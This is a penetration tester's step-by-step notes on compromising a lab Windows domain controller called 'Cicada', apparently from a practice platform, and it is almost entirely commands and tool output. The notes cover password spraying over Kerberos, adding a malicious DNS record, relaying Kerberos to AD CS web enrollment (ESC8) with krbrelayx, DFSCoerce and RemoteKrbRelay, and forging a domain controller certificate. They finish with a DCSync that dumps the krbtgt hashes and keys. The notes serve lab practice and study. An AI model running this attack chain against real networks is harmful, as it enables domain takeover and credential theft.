Cicada
This is not a writeup, just my notes about the machine.
Operating System: Windows Server 2022 Standard
Chain: False
Credentials
Username
Password
Method
Scope
Rosie.Powell
Cicada123
Password Spraying + Kerberos
Domain User
✅ Valid Usernames
Daniel.Marshall
Debra.Wright
Jane.Carter
Jordan.Francis
Joyce.Andrews
Katie.Ward
Megan.Simpson
Richard.Gibbons
Rosie.Powell
Shirley.West🔑 Passwords list
Cicada123Information Gathering
Nmap Scan
# Nmap 7.94SVN scan initiated Wed Apr 9 17:10:36 2025 as: nmap -sS -Pn -n -p- -T5 --open -A -oN ext_tcp_cicada_10.10.123.255 -vvv 10.10.123.255
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-09 21:17:07Z)
111/tcp open rpcbind syn-ack ttl 127 2-4 (RPC #100000)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
2049/tcp open nlockmgr syn-ack ttl 127 1-4 (RPC #100021)
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49203/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49672/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
65409/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
65447/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
65465/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portInitial enumeration
DNS
Not vulnerable to DNS Zone Transfer.
SMB (enum4linux-ng)
Domain: cicada.vl
FQDN: DC-JPQ225.cicada.vl
NFS
❯ showmount -e 10.10.123.255
Export list for 10.10.123.255:
/profiles (everyone)
❯ mkdir profiles
❯ sudo mount -t nfs 10.10.123.255:/profiles profiles -o nolockInside the profiles directory there a folders with possible usernames and two images one containing a possible password
User brute forcing
STATUS_NOT_SUPPORTED: NTLM authentication is disabled; instead, Kerberos authentication is used.
nxc smb 10.10.123.255 -u users.txt -p 'Cicada123'
SMB 10.10.123.255 445 10.10.123.255 [*] x64 (name:10.10.123.255) (domain:10.10.123.255) (signing:True) (SMBv1:False)
SMB 10.10.123.255 445 10.10.123.255 [-] 10.10.123.255\Administrator:Cicada123 STATUS_NOT_SUPPORTED
...
...Bruforcing with Kerberos authentication
❯ nxc smb DC-JPQ225.cicada.vl -u users.txt -p 'Cicada123' -k
<SNIF>
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [+] cicada.vl\Rosie.Powell:Cicada123 Requesting a TGT ticket
❯ impacket-getTGT cicada.vl/Rosie.Powell:'Cicada123' -dc-ip 10.10.123.255 -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in Rosie.Powell.ccache
❯ export KRB5CCNAME='~/Documents/Cicada/Content/Rosie.Powell.ccache'Discovering Vulnerable Certificate Templates (ESC8)
❯ certipy-ad find -k -no-pass -vulnerable -stdout -ns 10.10.123.255 -dc-ip DC-JPQ225.cicada.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'cicada-DC-JPQ225-CA' via CSRA
[!] Got error while trying to get CA configuration for 'cicada-DC-JPQ225-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'cicada-DC-JPQ225-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'cicada-DC-JPQ225-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : cicada-DC-JPQ225-CA
DNS Name : DC-JPQ225.cicada.vl
Certificate Subject : CN=cicada-DC-JPQ225-CA, DC=cicada, DC=vl
Certificate Serial Number : 7AB6BA064BFB22904C868758AF2017D2
Certificate Validity Start : 2025-04-09 21:05:46+00:00
Certificate Validity End : 2525-04-09 21:15:46+00:00
Web Enrollment : Enabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : CICADA.VL\Administrators
Access Rights
ManageCertificates : CICADA.VL\Administrators
CICADA.VL\Domain Admins
CICADA.VL\Enterprise Admins
ManageCa : CICADA.VL\Administrators
CICADA.VL\Domain Admins
CICADA.VL\Enterprise Admins
Enroll : CICADA.VL\Authenticated Users
[!] Vulnerabilities
ESC8 : Web Enrollment is enabled and Request Disposition is set to Issue
Certificate Templates : [!] Could not find any certificate templatesCompromise Domain Controller from Linux
Adding Malicious DNS Record
#Adding DNS using dnstool
python3 dnstool.py -k -u 'cicada.vl\Rosie.Powell' -p 'Cicada123' -r 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' -d 10.8.5.48 -a add DC-JPQ225.cicada.vl -dns-ip 10.10.72.89
#Adding DNS usig bloodyAD
bloodyAD -k --host DC-JPQ225.cicada.vl -d cicada.vl -u Rosie.Powell -p 'Cicada123' add dnsRecord 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.8.5.48Setting Up krbrelayx Environment
❯ git clone https://github.com/dirkjanm/krbrelayx.git
❯ cd krbrelayx
❯ python3 -m venv env
❯ source env/bin/activateLaunching krbrelayx Attack
Format: HOSTNAME1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA
python krbrelayx.py -t 'http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp' --adcs --template DomainController -v 'DC-JPQ225$' 2>/dev/null
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMB loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connectionsTriggering Coercion via DFS
❯ KRB5CCNAME='Rosie.Powell.ccache' python3 dfscoerce.py -k -no-pass 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' dc-jpq225.cicada.vl#Output generated from previous krbrelayx.py and dfscoerce.py steps.
[*] SMBD: Received connection from 10.10.123.255
[*] HTTP server returned status code 200, treating as a successful login
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] SMBD: Received connection from 10.10.123.255
[*] HTTP server returned status code 200, treating as a successful login
[*] Skipping user DC-JPQ225$ since attack was already performed
[*] GOT CERTIFICATE! ID 15
[*] Writing PKCS#12 certificate to ./DC-JPQ225$.pfx
[*] Certificate successfully written to filePath: Certipy-ad tool
Retrieving domain controller NT Hash
❯ certipy-ad auth -username 'DC-JPQ225$' -pfx DC-JPQ225\$.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: dc-jpq225$@cicada.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'dc-jpq225.ccache'
[*] Trying to retrieve NT hash for 'dc-jpq225$'
[*] Got hash for 'dc-jpq225$@cicada.vl': aad3b435b51404eeaad3b435b51404ee:630c1dcb6759aa4a11e64602f4d7c45fRequesting domain controller Ticket Granting Ticket
❯ impacket-getTGT cicada.vl/'dc-jpq225$' -hashes 'aad3b435b51404eeaad3b435b51404ee:630c1dcb6759aa4a11e64602f4d7c45f'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in dc-jpq225$.ccachePerforming DCSync Attack against domain controller
❯ KRB5CCNAME='dc-jpq225$.ccache' impacket-secretsdump -k -no-pass dc-jpq225.cicada.vl -dc-ip 10.10.72.89 -just-dc-user krbtgt
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8dd165a43fcb66d6a0e2924bb67e040c:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:ed5b82d607535668e59aa8deb651be5abb9f1da0d31fa81fd24f9890ac84693d
krbtgt:aes128-cts-hmac-sha1-96:9b7825f024f21e22e198e4aed70ff8ea
krbtgt:des-cbc-md5:2a768a9e2c983e31
[*] Cleaning up... Path: PKINITtools tools
Requesting TGT Using PKINIT and PFX Certificate
Use a python environment and install the requirements
❯ python gettgtpkinit.py -cert-pfx ../krbrelayx/DC-JPQ225\$.pfx 'cicada.vl/DC-JPQ225$' dc.ccache
2025-04-14 00:20:51,783 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-04-14 00:20:52,087 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2025-04-14 00:20:52,443 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-04-14 00:20:52,443 minikerberos INFO 5ef899aa9751b0343c82c19152c592e95a24b1ce56fd0fc3ef9596a77f1b1d47
INFO:minikerberos:5ef899aa9751b0343c82c19152c592e95a24b1ce56fd0fc3ef9596a77f1b1d47
2025-04-14 00:20:52,445 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to fileDumping Domain Secrets with secretsdump
❯ KRB5CCNAME='dc.ccache' impacket-secretsdump -k -no-pass dc-jpq225.cicada.vl -just-dc-user krbtgt
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8dd165a43fcb66d6a0e2924bb67e040c:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:ed5b82d607535668e59aa8deb651be5abb9f1da0d31fa81fd24f9890ac84693d
krbtgt:aes128-cts-hmac-sha1-96:9b7825f024f21e22e198e4aed70ff8ea
krbtgt:des-cbc-md5:2a768a9e2c983e31
[*] Cleaning up... Compromise Domain Controller from Windows
Setting up DNS
Joining to the domain controller.
Launching RemoteKrbRelay attack
PS C:\Temp> RemoteKrbRelay.exe -adcs -template DomainController -victim dc-jpq225.cicada.vl -target dc-jpq225.cicada.vl -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3
/\_/\____,
,___/\_/\ \ ~ /
\ ~ \ ) XXX
XXX / /\_/\___,
\o-o/-o-o/ ~ /
) / \ XXX
_| / \ \_/
,-/ _ \_/ \
/ ( /____,__| )
( |_ ( ) \) _|
_/ _) \ \__/ (_
(,-(,(,(,/ \,),),)
CICADA8 Research Team
From Michael Zhmaylo (MzHmO)
[+] Setting UP Rogue COM at port 12345
[+] Registering...
[+] Register success
[+] Forcing Authentication
[+] Using CLSID: d99e6e74-fc88-11d0-b498-00a0c90312f3
[*] apReq: 6082071f06...
[+] Got Krb Auth from NT/System. Relaying to ADCS now...
[*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*] fContextReq: Delegate, MutualAuth, ReplayDetect, SequenceDetect, Confidentiality, UseDceStyle, Connection
[+] Received Kerberos Auth from dc-jpq225.cicada.vl with ticket on http/dc-jpq225.cicada.vl
[*] apRep2: 6f5b305...
[+] HTTP session established
[+] Cookie ASPSESSIONIDSSDRDQTA=IHPNGIODCGPMFFNKEE...; path=/
[+] Lets get certificate for "cicada.vl\dc-jpq225$" using "DomainController" template
[+] Success (ReqID: 17)Writting the base64 string into a file.
echo -ne "MIIC8DCCAdigAwIBAgI<SNIF>" | base64 -d > cert.p12Obtaining Domain Controller NT Hash
certipy auth -pfx cert.p12 -dc-ip 10.10.104.125 -domain cicada.vl
export KRB5CCNAME=dc-jpq225.ccache
[*] Using principal: dc-jpq225$@cicada.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'dc-jpq225.ccache'
[*] Trying to retrieve NT hash for 'dc-jpq225$'
[*] Got hash for 'dc-jpq225$@cicada.vl': aad3b435b51404eeaad3b435b51404ee:630c1dcb6759aa4a11e64602f4d7c45fPerforming DCSync Attack against Domain Controller.
❯ KRB5CCNAME='dc-jpq225$.ccache' impacket-secretsdump -k -no-pass dc-jpq225.cicada.vl -dc-ip 10.10.72.89 -just-dc-user krbtgt
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8dd165a43fcb66d6a0e2924bb67e040c:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:ed5b82d607535668e59aa8deb651be5abb9f1da0d31fa81fd24f9890ac84693d
krbtgt:aes128-cts-hmac-sha1-96:9b7825f024f21e22e198e4aed70ff8ea
krbtgt:des-cbc-md5:2a768a9e2c983e31Last updated